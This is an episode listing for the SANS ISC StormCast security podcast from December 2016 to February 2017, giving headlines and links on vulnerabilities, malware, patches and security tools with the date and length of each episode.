How Was Your Stay At The Hotel La Playa https://isc.sans.edu/forums/diary/How+was+your+stay+at+the+Hotel+La+Playa/22069
XAgent OS X Malware https://labs.bitdefender.com/2017/02/new-xagent-mac-malware-linked-with-the-apt28/
Conference Phone Compromise https://www.contextis.com//resources/blog/phwning-boardroom-hacking-android-conference-phone/
2/16/2017 (5 minutes, 28 seconds)

ISC StormCast for Wednesday, February 15th 2017

Microsoft Cancels Patch Tuesday https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/
Adobe Update For Flash https://helpx.adobe.com/security/products/flash-player/apsb17-04.html
WebSphere Update http://www-01.ibm.com/support/docview.wss?uid=swg21997743
Operation Kingphish https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.965et86vk
Hacking Node-Serialize http://blog.websecurify.com/2017/02/hacking-node-serialize.html
2/15/2017 (5 minutes, 46 seconds)

ISC StormCast for Tuesday, February 14th 2017

New Tool: Packettotal.com http://www.packettotal.com
What Not To Decrypt When Intercepting SSL https://isc.sans.edu/forums/diary/Stuff+I+Learned+Decrypting/22059/ (webcast: https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277)
Simple Static Malware Analyzer https://github.com/secrary/SSMA
Critical Firefox for Android Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2017-04/
Ubuntu ntfs-3g Privilege Escalation https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Microsoft Patch Tuesday Changes http://www.infoworld.com/article/3139922/microsoft-windows/microsoft-to-revamp-its-documentation-for-security-patches.html
2/14/2017 (5 minutes, 28 seconds)

ISC StormCast for Monday, February 13th 2017

Vulnerabilities in Samsung KNOX https://googleprojectzero.blogspot.de/2017/02/lifting-hyper-visor-bypassing-samsungs.html
Auditing MongoDB Configurations https://github.com/stampery/mongoaudit
Reversing JavaScript https://isc.sans.edu/forums/diary/Analysis+of+a+Suspicious+Piece+of+JavaScript/22056/
WordPress REST API Flaw Widely Exploited https://www.wordfence.com/blog/2017/02/rapid-growth-in-rest-api-defacements/
Cryptographically Secure PHP Development https://paragonie.com/blog/2017/02/cryptographically-secure-php-development
DEV522 Web Application Security Essentials https://www.sans.org/event/sans-2017/course/defending-web-applications-security-essentials
2/13/2017 (5 minutes, 57 seconds)

ISC StormCast for Friday, February 10th 2017

F5 Big IP Ticketbleed Vulnerability https://filippo.io/Ticketbleed/
CryptoShield Ransomware from Rig EK https://isc.sans.edu/forums/diary/CryptoShield+Ransomware+from+Rig+EK/22047/
Hancitor/Pony Malspam https://isc.sans.edu/forums/diary/HancitorPony+malspam/22053/
Apple Retaining Old Browser History Data https://blog.elcomsoft.com/2017/02/elcomsoft-extracts-deleted-safari-browsing-history-from-icloud/#more-3769
Brute Forcing LUKS Passwords https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811
2/10/2017 (6 minutes, 15 seconds)

ISC StormCast for Thursday, February 9th 2017

Cloud Metadata URLs https://isc.sans.edu/forums/diary/Cloud+Metadata+Urls/22046/
Intel Atom C2000 Chip Failures http://www.theregister.co.uk/2017/02/06/cisco_intel_decline_to_link_product_warning_to_faulty_chip/
More W-2 Scams, Now Combined With Wire Transfer Scams https://nakedsecurity.sophos.com/2017/02/08/beware-the-latest-tax-season-spear-phishing-scam/
Macro Malware Coming to MacOS https://objective-see.com/blog/blog_0x17.html
2/9/2017 (6 minutes, 26 seconds)

ISC StormCast for Wednesday, February 8th 2017

Using Emojis as Passwords https://isc.sans.edu/forums/diary/My+Password+is+taco+Using+Emojis+for+Stronger+Passwords/22042/
Popular iOS Applications Not Using TLS https://medium.com/@chronic_9612/76-popular-apps-confirmed-vulnerable-to-silent-interception-of-tls-protected-data-2c9a2409dd1#.nv0mf6w4e
Web Bluetooth Security Model https://medium.com/@jyasskin/the-web-bluetooth-security-model-666b4e7eed2#.kqtxdk70h
E-Mail Spoofing in Gmail https://www.linkedin.com/pulse/aware-sender-spoofing-amongst-gmail-users-renato-marinho
2/8/2017 (7 minutes, 5 seconds)

ISC StormCast for Tuesday, February 7th 2017

Malicious or Not? Help Me Decide https://isc.sans.edu/forums/diary/Malicious+Or+Not+You+decide/22040/
OpenBSD Http Server DoS Vulnerability https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html
Bypassing Tor Browser Via Windows DRM https://www.myhackerhouse.com/windows_drm_vs_torbrowser/
Freedom Hosting II Compromise https://www.scmagazineuk.com/major-dark-web-host-hacked-381000-sets-of-user-details-leaked-online/article/636259/
2/7/2017 (5 minutes, 51 seconds)

ISC StormCast for Monday, February 6th 2017

Base64 Encoded Malware Samples on Pastebin https://isc.sans.edu/forums/diary/Many+Malware+Samples+Found+on+Pastebin/22036/
Cisco Recalling Meraki Access Points over Fatal Hardware Flaw http://www.cisco.com/c/en/us/support/web/clock-signal.html
SQL Injection Vulnerability in McAfee ePolicy Orchestrator https://kc.mcafee.com/corporate/index?page=content&id=SB10187
Update from Microsoft on SMB 3 Vulnerability https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/
Malicious Files Sent via WhatsApp to Target Indian Military http://economictimes.indiatimes.com/news/defence/defence-security-forces-alerted-against-whatsapp-virus/articleshow/56258702.cms
2/6/2017 (5 minutes, 28 seconds)

ISC StormCast for Friday, February 3rd 2017

SMB 3 0-Day DoS Exploit https://isc.sans.edu/forums/diary/Windows+SMBv3+Denial+of+Service+Proof+of+Concept+0+Day+Exploit/22029/
WordPress Update Silently Fixes Security Flaw https://make.wordpress.org/core/2017/02/01/disclosure-of-additional-security-fix-in-wordpress-4-7-2/
Webroot Update Patches BSOD Flaw https://community.webroot.com/t5/Product-Questions/BSOD-0x50-PAGE-FAULT-IN-NONPAGED-AREA/td-p/284302?sf54120672=1&sf54123115=1
Google Adds Support for Mandatory Two-Factor Authentication to G-Suite https://security.googleblog.com/2017/02/better-and-more-usable-protection-from.html
Cisco Prime Home Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170201-prime-home
2/3/2017 (5 minutes, 27 seconds)

ISC StormCast for Thursday, February 2nd 2017

Multiple Vulnerabilities in tcpdump https://isc.sans.edu/forums/diary/Multiple+Vulnerabilities+in+tcpdump/22017/
Quick Analysis of Data Left Available by Attackers https://isc.sans.edu/forums/diary/Quick+Analysis+of+Data+Left+Available+by+Attackers/22015/
Securing The Human Ouch! Newsletter https://securingthehuman.sans.org/ouch/
Redis CSRF Vulnerability Exploit https://github.com/dxa4481/whatsinmyredis
2/2/2017 (4 minutes, 59 seconds)

ISC StormCast for Wednesday, February 1st 2017

Fileless UAC Bypass Used to Drop Keybase Malware https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/
Apple Removes Activation Lock Test Tool After Abuse https://www.macrumors.com/2017/01/30/activation-lock-website-used-in-hack/
Multiple Vulnerabilities in tcpdump https://www.debian.org/security/2017/dsa-3775
Postscript Printer Vulnerabilities http://seclists.org/fulldisclosure/2017/Jan/89
Stop Disabling SELinux https://learntemail.sam.today/blog/stop-disabling-selinux:-a-real-world-guide/
2/1/2017 (5 minutes, 36 seconds)

ISC StormCast for Tuesday, January 31st 2017

py2exe Decompiling Part 2 https://isc.sans.edu/forums/diary/py2exe+Decompiling+Part+2/22005/
Telemarketer Leaks Call Recordings https://mackeeper.com/blog/post/326-telemarketing-company-leaks-400k-of-sensitive-files
Facebook Introduces Delegated Recovery Protocol https://github.com/facebookincubator/DelegatedRecovery/ https://raw.githubusercontent.com/facebookincubator/DelegatedRecovery/master/draft-hill-delegated-recovery.raw.txt
Another Cisco WebEx Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex
Cryptkeeper Does Not Correctly Encrypt Folders https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=852751
1/31/2017 (6 minutes, 36 seconds)

ISC StormCast for Monday, January 30th 2017

Port 5358 Scans for Devices https://isc.sans.edu/forums/diary/Request+for+Packets+and+Logs+TCP+5358/21997/
OpenSSH Vulnerability http://www.openwall.com/lists/oss-security/2017/01/26/2
Ransomware Hits Traffic Cameras in DC https://www.washingtonpost.com/local/public-safety/hackers-hit-dc-police-closed-circuit-camera-network-city-officials-disclose/2017/01/27/d285a4a4-e4f5-11e6-ba11-63c4b4fb5a63_print.html
Hotel Hit By Ransomware http://www.thelocal.at/20170128/hotel-ransomed-by-hackers-as-guests-locked-in-rooms
Not So Private Android VPNs http://www.icir.org/vern/papers/vpn-apps-imc16.pdf
Google Starting its own Certificate Authority https://security.googleblog.com/2017/01/the-foundation-of-more-secure-web.html
1/30/2017 (6 minutes, 41 seconds)

ISC StormCast for Friday, January 27th 2017

IOCs: Risks of False Positive Floods https://isc.sans.edu/forums/diary/IOCs+Risks+of+False+Positive+Alerts+Flood+Ahead/21977/
Android Ransomware in Google Play Store http://blog.checkpoint.com/2017/01/24/charger-malware/
OpenSSL Update https://www.openssl.org/news/vulnerabilities.html#y2017
Facebook To Implement U2F (FIDO) Login https://www.facebook.com/notes/facebook-security/security-key-for-safer-logins-with-a-touch/10154125089265766
WebEx Update https://bugs.chromium.org/p/project-zero/issues/detail?id=1100
1/27/2017 (5 minutes, 35 seconds)

ISC StormCast for Thursday, January 26th 2017

Cisco WebEx Remains Vulnerable. Other Browsers Affected https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex
Malicious SVG Files Found in the Wild https://isc.sans.edu/forums/diary/Malicious+SVG+Files+in+the+Wild/21971/
W2 Scams Hitting Again http://www.nbcdfw.com/news/local/Argyle-ISD-Employees-Hit-with-Data-Breach-411337825.html
XXE Entity Vulnerability in Uber https://httpsonly.blogspot.co.ke/2017/01/0day-writeup-xxe-in-ubercom.html?m=1
Firefox 51 Released https://blog.mozilla.org/security/2017/01/20/communicating-the-dangers-of-non-secure-http/
1/26/2017 (5 minutes, 49 seconds)

ISC StormCast for Wednesday, January 25th 2017

Cisco Releases Patch for Chrome Webex Plugin https://continuum.cisco.com/2017/01/23/its-a-good-idea-to-patch-your-webex-chrome-extension-now/
Companies Fall For Fake Ransomware https://www.citrix.com/blogs/2017/01/24/bluff-ransomware-attacks-bamboozle-british-businesses/
systemd Privilege Escalation Vulnerability http://www.openwall.com/lists/oss-security/2017/01/24/4
nginx Update Released http://nginx.org/en/CHANGES
1/25/2017 (5 minutes, 26 seconds)

ISC StormCast for Tuesday, January 24th 2017

Experimenting With IPv6 Fragments https://isc.sans.edu/forums/diary/How+to+Have+Fun+With+IPv6+Fragments+and+Scapy/21963/
Apple Updates Everything https://support.apple.com/en-us/HT201222
WebEx Secret Install URL https://bugs.chromium.org/p/project-zero/issues/detail?id=1096
Vulnerability in Symantec Norton Download Manager https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2017&suid=20170117_00
Exploit for Microsoft RDC Client on Mac https://www.wearesegment.com/research/Microsoft-Remote-Desktop-Client-for-Mac-Remote-Code-Execution
1/24/2017 (5 minutes, 42 seconds)

ISC StormCast for Monday, January 23rd 2017

Sage 2.0 Ransomware https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/
Starwars Twitter Botnet https://regmedia.co.uk/2017/01/20/starwarsbotnet.pdf
Symantec Messes Up SSL Certificates Again https://www.mail-archive.com/[email protected]/msg05455.html
GitHub CSP Experiences https://githubengineering.com/githubs-post-csp-journey/
Podcast Survey https://www.surveymonkey.com/r/sbn2017
1/23/2017 (5 minutes, 46 seconds)

ISC StormCast for Friday, January 20th 2017

Open Hadoop Instances Are At Risk http://www.threatgeek.com/2017/01/open-hadoop-installs-wiped-worldwide.html
Upcoming SHA-1 Deadlines https://blog.mozilla.org/security/2016/10/18/phasing-out-sha-1-on-the-public-web/
Google "Verify Apps" Algorithm https://blog.google/topics/connected-workspaces/silence-speaks-louder-words-when-finding-malware/
Practical JSONP Injection https://securitycafe.ro/2017/01/18/practical-jsonp-injection/
Necurs Decline Hurting Locky Distribution http://blog.talosintel.com/2017/01/locky-struggles.html
1/19/2017 (6 minutes, 11 seconds)

ISC StormCast for Thursday, January 19th 2017

US-CERT Considers NetBIOS/SMBv1 Harmful https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices
IPv6 Atomic Fragments Can Lead to DDoS Attack https://tools.ietf.org/html/rfc8021
Facebook Was Affected by ImageTragick Flaw http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
Malwarebytes Identifies Old Mac Backdoor https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixJAVA
1/18/2017, 6 minutes, 28 seconds

ISC StormCast for Wednesday, January 18th 2017

domain_stats.py: A Web API For SIEM Phishing Hunts https://isc.sans.edu/forums/diary/domainstatspy+a+web+api+for+SEIM+phishing+hunts/21943/
Multiple RCE in ZyXEL/Billion/True Online Routers http://seclists.org/fulldisclosure/2017/Jan/40
Dovecot Passes Security Audit https://wiki.mozilla.org/images/4/4d/Dovecot-report.pdf
Dutch Web Developer Left Backdoors Behind http://www.theregister.co.uk/2017/01/17/police_warn_of_dutch_developer_who_built_backdoors_for_carding/
Mobile Applications Contain Secrets https://hackernoon.com/we-reverse-engineered-16k-apps-heres-what-we-found-51bdf3b456bb
1/17/2017, 5 minutes, 19 seconds

ISC StormCast for Tuesday, January 17th 2017

Whitelisting File Extensions in Apache https://isc.sans.edu/forums/diary/Whitelisting+File+Extensions+in+Apache/21937/
WordPress 4.7.1 Updates PHPMailer https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Tricky Phishing Attacks Harvesting Google Passwords https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/
More Refined Browser Fingerprinting Via GPU Features https://drive.google.com/file/d/0B4s900Byvv1ibW5uc1NiU2g3R3c/view
1/16/2017, 5 minutes, 27 seconds

ISC StormCast for Monday, January 16th 2017

Backup Files Are Good if They Are Outside Your Web Server's Document Root https://isc.sans.edu/forums/diary/Backup+Files+Are+Good+but+Can+Be+Evil/21935/
Exploiting Apache Server Status http://blog.mazinahmed.net/2017/01/exploiting-misconfigured-apache-server-status-instances.html
WhatsApp Backdoor Controversy https://www.theguardian.com/technology/2017/jan/13/whatsapp-backdoor-allows-snooping-on-encrypted-messages https://whispersystems.org/blog/there-is-no-whatsapp-backdoor/
Hardening Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/
Injecting JavaScript Into PDFs http://insert-script.blogspot.in/2016/10/pdf-how-to-steal-pdfs-by-injecting.html
1/15/2017, 7 minutes, 22 seconds

ISC StormCast for Friday, January 13th 2017

System Resource Utilization Monitor (SRUM) https://isc.sans.edu/forums/diary/System+Resource+Utilization+Monitor/21927/
Docker Fixes Privilege Escalation Vulnerability http://seclists.org/fulldisclosure/2017/Jan/21
Taking Over Expired Name Servers https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/
Updated Certificate Revocation Data https://isc.sans.edu/crls.html
Shadow Brokers Releasing More Tools and Going Dark https://heimdalsecurity.com/blog/security-alert-the-shadow-brokers-windows-hacking-tools/
Extracting Fingerprints from Selfies http://www.japantimes.co.jp/news/2017/01/11/national/crime-legal/researchers-warn-fingerprint-theft-peace-sign/
1/13/2017, 6 minutes, 28 seconds

ISC StormCast for Thursday, January 12th 2017

Hancitor/Pony/Vawtrak Installed by Malicious Word Document in Fake Parking Ticket E-Mail https://isc.sans.edu/forums/diary/HancitorPonyVawtrak+malspam/21919/
GoDaddy Revokes > 6,000 SSL Certs After Validation Bug https://www.godaddy.com/garage/godaddy/information-about-ssl-bug/
DVR Master Password List Leaked https://www.pentestpartners.com/blog/leaked-dvr-creds-added-to-the-iot-fail-list/
Autofill Enables Information Leakage https://github.com/anttiviljami/browser-autofill-phishing
1/12/2017, 6 minutes, 4 seconds

ISC StormCast for Wednesday, January 11th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/January+2017+Microsoft+Patch+Tuesday/21915/
Adobe Patch Tuesday Summary https://isc.sans.edu/forums/diary/Adobe+January+2017+Patches/21917/
Port 37777 "MapTable" Requests https://isc.sans.edu/forums/diary/Port+37777+MapTable+Requests/21913/
CVE-2016-7200/7201 Exploit Included in Sundown Exploit Kit http://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201.html
1/11/2017, 5 minutes, 35 seconds

ISC StormCast for Tuesday, January 10th 2017

Damn Vulnerable Web Sockets (DVWS) Demonstrates WebSocket Vulnerabilities https://github.com/interference-security/DVWS
St. Jude Medical Patches Vulnerable Cardiac Devices https://threatpost.com/st-jude-medical-patches-vulnerable-cardiac-devices/122955/
Cracking Hashes of Passwords 12 Characters and Longer http://www.netmux.com/blog/cracking-12-character-above-passwords
VNC Library Update https://www.debian.org/security/2017/dsa-3753
1/9/2017, 5 minutes, 47 seconds

ISC StormCast for Monday, January 9th 2017

Careful With Security Tools That Submit Files to VirusTotal https://isc.sans.edu/forums/diary/Great+Misadventures+of+Security+Vendors+Absurd+Sandboxing+Edition/21895/
Vulnerable Security Tools Can Be Used Against You https://isc.sans.edu/forums/diary/Using+Security+Tools+to+Compromize+a+Network/21903/
Elaborate Ransomware Attacks http://www.actionfraud.police.uk/news/department-of-education-ransomware-alert-jan17
E-Mail and iTunes Popup Extortion https://blog.malwarebytes.com/101/mac-the-basics/2017/01/tech-support-scam-page-attempts-denial-of-service-via-mail-app/
1/9/2017, 5 minutes, 45 seconds

ISC StormCast for Friday, January 6th 2017

Google.com.br DNS Hijack https://www.linkedin.com/pulse/googlecombr-hacked-renato-marinho
Attackers Use Stolen Passwords To Take Over Spreadshirt.com Accounts https://www.heise.de/security/meldung/Angriff-auf-Spreadshirt-Konten-3589579.html (sorry, only in German)
Ransomware Adding DDoS Component https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/
Old Malware Returning in Targeted Attacks https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose
1/6/2017, 6 minutes, 1 second

ISC StormCast for Thursday, January 5th 2017

GRE Packets May Be Related To Linux Kernel Bug http://www.openwall.com/lists/oss-security/2016/10/13/11
Insecure MongoDB Instances Hit By Fake Ransomware https://twitter.com/0xDUDE
Android Security Update https://source.android.com/security/bulletin/2017-01-01.html
Identifying WordPress Websites on Local Networks https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/
1/5/2017, 5 minutes, 24 seconds

ISC StormCast for Wednesday, January 4th 2017

Removing "Ransomware" From Android-Based LG TVs https://www.youtube.com/watch?v=0WZ4uLFTHEE
libpng Patches 30-Year-Old Bug http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.567619
Kaspersky Antivirus SSL Interception Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=978
Thunderbird Update Fixes Critical Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2016-96/
1/3/2017, 4 minutes, 58 seconds

ISC StormCast for Tuesday, January 3rd 2017

AT&T 2G Network Shutdown https://www.att.com/esupport/article.html#!/wireless/KM1084805
Leap Second https://blog.cloudflare.com/how-and-why-the-leap-second-affected-cloudflare-dns/
Thunderbird Patch https://www.heise.de/security/meldung/Thunderbird-Mozilla-schliesst-mit-Sicherheitsupdate-kritische-Luecken-3583472.html
iMessage Crash https://vincedes3.com/crash-message-app-iphone/
Truffle Hog https://github.com/dxa4481/truffleHog
1/3/2017, 5 minutes, 6 seconds

ISC StormCast for Friday, December 30th 2016

Protocol 47 (GRE) Traffic https://isc.sans.edu/forums/diary/Increase+in+Protocol+47+denys/21865/
US-CERT Releases "Grizzly Steppe" Report https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity
Android Malware Changes Router DNS Settings https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/
12/30/2016, 3 minutes, 57 seconds

ISC StormCast for Thursday, December 29th 2016

More PHPMailer Issues. Update Again https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
CCC Talk: Lockpicking in the IoT https://media.ccc.de/v/33c3-8019-lockpicking_in_the_iot
CCC Talk: IPv6 Scanning https://media.ccc.de/v/33c3-8061-you_can_-j_reject_but_you_can_not_hide_global_scanning_of_the_ipv6_internet
12/29/2016, 5 minutes

ISC StormCast for Wednesday, December 28th 2016

Using Daemonlogger as a Software Tap https://isc.sans.edu/forums/diary/Using+daemonlogger+as+a+Software+Tap/21859/
CCC Conference https://events.ccc.de/congress/2016/wiki/Main_Page
PHPMailer Exploit Released https://legalhackers.com/exploits/CVE-2016-10033/PHPMailer-RCE-exploit-poc.txt
Patch For Exim Mail Server https://exim.org/static/doc/CVE-2016-9963.txt
Signal Uses Domain Fronting To Evade Censorship https://whispersystems.org/blog/doodles-stickers-censorship/
12/28/2016, 5 minutes, 32 seconds

ISC StormCast for Tuesday, December 27th 2016

Critical RCE Flaw in PHPMailer https://isc.sans.edu/forums/diary/Critical+security+update+PHPMailer+5218+CVE201610033/21855/
Malware Delays Execution with "Ping" https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/
Apple Extends TLS Deadline https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/
12/27/2016, 6 minutes, 2 seconds

ISC StormCast for Thursday, December 22nd 2016

Mirai Trying Various Telnet Alternatives https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/
Ukrainian Power Outages http://uawire.org/news/ukrenergo-claims-that-blackouts-in-kyiv-could-have-been-caused-by-hackers
OurMine Hacks Netflix and Other Twitter Accounts http://www.bbc.com/news/technology-38390343?ocid=socialflow_twitter
Methbot Generating Millions of Dollars With Click Fraud http://go.whiteops.com/rs/179-SQE-823/images/WO_Methbot_Operation_WP.pdf
12/21/2016, 4 minutes, 37 seconds

ISC StormCast for Wednesday, December 21st 2016

vSphere Data Protection Known SSH Key http://www.vmware.com/security/advisories/VMSA-2016-0024.html
nmap Update https://nmap.org/download.html
SCCM Software Metering https://www.fireeye.com/blog/threat-research/2016/12/do_you_see_what_icc.html
CryptXXX Version 3 Decryptor Available https://noransom.kaspersky.com
Airline Inflight Entertainment System Hack http://blog.ioactive.com/2016/12/in-flight-hacking-system.html
SEC503, Intrusion Detection in Depth: Brussels, January 16th-21st 2017 https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/21/2016, 5 minutes, 5 seconds

ISC StormCast for Tuesday, December 20th 2016

Mirai Likely Behind Port 6789 Scans. Yet Another Backdoor https://isc.sans.edu/forums/diary/Mirai+Scanning+for+Port+6789+Looking+for+New+Victims/21833/
OpenSSH Update https://www.openssh.com/releasenotes.html#7.4
Google Releases Tool to Audit Crypto Libraries https://security.googleblog.com/2016/12/project-wycheproof.html
Escaping A Restricted Shell https://humblesec.wordpress.com/2016/12/08/escaping-a-restricted-shell/
12/20/2016, 4 minutes, 17 seconds

ISC StormCast for Monday, December 19th 2016

Verizon Webmail XSS Exploit https://randywestergren.com/persistent-xss-verizons-webmail-client/
Blocking PowerShell Connections via Windows Firewall https://isc.sans.edu/forums/diary/Blocking+Powershell+Connection+via+Windows+Firewall/21829/
Exploit Kits Delivering Cerber Ransomware https://isc.sans.edu/forums/diary/One+if+by+email+and+two+if+by+EK+The+Cerbers+are+coming/21823/
More Security Companies Joining "No More Ransom" https://www.nomoreransom.org
IT Contractor Trying to Take Over Radio Station https://regmedia.co.uk/2016/12/16/kcohvtaylorfiling.pdf
Holiday Safe Computing Tips https://isc.sans.edu/forums/diary/Holiday+Safe+Computing+Tips/21827/
12/19/2016, 5 minutes, 52 seconds

ISC StormCast for Friday, December 16th 2016

DomainCop Malware Analysis https://isc.sans.edu/forums/diary/Domaincop+malpsam/21821/
OS X FileVault Password Retrieval http://blog.frizk.net/2016/12/filevault-password-retrieval.html
QEMU/Xen Vulnerability http://xenbits.xen.org/xsa/advisory-199.html
DNS Changer Attacking Home Routers https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
12/16/2016, 5 minutes, 25 seconds

ISC StormCast for Thursday, December 15th 2016

Malicious JavaScript Bypasses UAC https://isc.sans.edu/forums/diary/UAC+Bypass+in+JScript+Dropper/21813/
Skype Unauthorized API Access Blocked https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Backdoor-in-Skype-for-Mac-OS-X/?page=1&year=0&month=0
Facebook Announces Certificate Transparency Monitoring Tool https://www.facebook.com/notes/protect-the-graph/introducing-our-certificate-transparency-monitoring-tool/1811919779048165
Another Tor Browser (and Firefox) Bug Fixed https://blog.torproject.org/blog/tor-browser-608-released
Cheap Android Phones Arrive With Malware Preinstalled https://news.drweb.com/show/?i=10345&lng=en
Exploit for Nagios https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
12/15/2016, 5 minutes, 28 seconds

ISC StormCast for Wednesday, December 14th 2016

Microsoft Patch Tuesday + Adobe Flash https://isc.sans.edu/mspatchdays.html?viewday=2016-12-13
Apple Updates https://support.apple.com/en-us/HT201222
More Netgear Products Vulnerable; Beta Patch Available http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic
iOS Profile Vulnerability PoC Available https://cxsecurity.com/issue/WLB-2016110046
12/14/2016, 5 minutes, 2 seconds

ISC StormCast for Tuesday, December 13th 2016

Apple Releases Patches for iOS/watchOS and tvOS https://support.apple.com/en-us/HT201222
Windows 8/10 Update Causing DHCP Problems https://community.plus.net/t5/Broadband/Windows-8-10-Issues/m-p/1393675#M310992
McAfee VirusScan Enterprise for Linux Vulnerabilities https://nation.state.actor/mcafee.html
Snowball Marketing for Ransomware https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/
Europol Arrests DDoS Miscreants http://www.theregister.co.uk/2016/12/12/europol_arrests_34_ddos_kiddies/
5 Questions to Ask Your IoT Vendor https://isc.sans.edu/forums/diary/5+Questions+to+Ask+your+IoT+Vendors+But+Do+Not+Expect+an+Answer/21807/
12/13/2016, 5 minutes, 49 seconds

ISC StormCast for Monday, December 12th 2016

Malware Uses NTP to Prevent Reverse Analysis https://isc.sans.edu/forums/diary/Sleeping+VBS+Really+Wants+To+Sleep/21801/
PwC ACE Tool For SAP Introduces Security Vulnerability into SAP http://seclists.org/fulldisclosure/2016/Dec/33
Steganography Used to Hide Exploits in Images https://isc.sans.edu/forums/diary/Steganography+in+Action+Image+Steganography+StegExpose/21803/
Netgear R7000 and R6400 Arbitrary Command Execution http://www.kb.cert.org/vuls/id/582384
Holiday Hack Challenge https://holidayhackchallenge.com
12/11/2016, 5 minutes, 47 seconds

ISC StormCast for Friday, December 9th 2016

DomainCop Malware https://isc.sans.edu/forums/diary/Good+Cop+Bad+Cop+Domain+Cop/21795/
Yahoo Mail Persistent XSS https://klikki.fi/adv/yahoo2.html
Trend Micro OfficeScan False Positives https://www.reddit.com/r/sysadmin/comments/5gs2gv/anyone_else_also_affected_by_a_deleted/
Linux Privilege Escalation Due to af_packet.c Race Condition http://seclists.org/oss-sec/2016/q4/607
12/9/2016, 5 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, December 8th 2016

Attackers are using AV Exclusion Lists to Bypass AV http://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/ Android Update Patches "Dirty Cow" https://source.android.com/security/bulletin/2016-12-01.html "Goldeneye" Ransomware May Use Stolen Data For Realistic E-Mails https://www.heise.de/security/meldung/Goldeneye-nutzt-Informationen-vom-Arbeitsamt-fuer-aeusserst-gezielte-Angriffe-3564386.html Firefox Cross Domain Cookie Vulnerability https://insert-script.blogspot.ch/2016/12/firefox-svg-cross-domain-cookie.html
12/8/2016, 6 minutes

ISC StormCast for Wednesday, December 7th 2016

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications/21787/ Heap Buffer Overflow in Encase Forensic Imager https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161128-0_Guidance_Software_Encase_DoS_heap_buffer_overflow_vulnerabilities_v10.txt Raspbian To Increase Default Security https://www.raspberrypi.org/blog/a-security-update-for-raspbian-pixel/ SONY Camera Backdoor https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161206-0_Sony_IPELA_Engine_IP_Cameras_Backdoors_v10.txt Feedback: https://isc.sans.edu/contact.html
12/7/2016, 6 minutes, 30 seconds

ISC StormCast for Tuesday, December 6th 2016

Video Walk Through: Analysing Hancitor Malicious Document https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Videos/21783/ Rapid Distributed Credit Card Number Brute Forcing http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-BDB3-73C22D6E1FDB.pdf Cloudflare Detecting Large DDoS Attacks Over Thanksgiving / Cyber Monday https://blog.cloudflare.com/the-daily-ddos-ten-days-of-massive-attacks/ Free Windows Tool to Harden Networks: SAMRi10 https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b NY State Outlawing Automated Ticket Purchasing Software https://www.nysenate.gov/legislation/bills/2015/S8123
12/6/2016, 5 minutes, 30 seconds

ISC StormCast for Monday, December 5th 2016

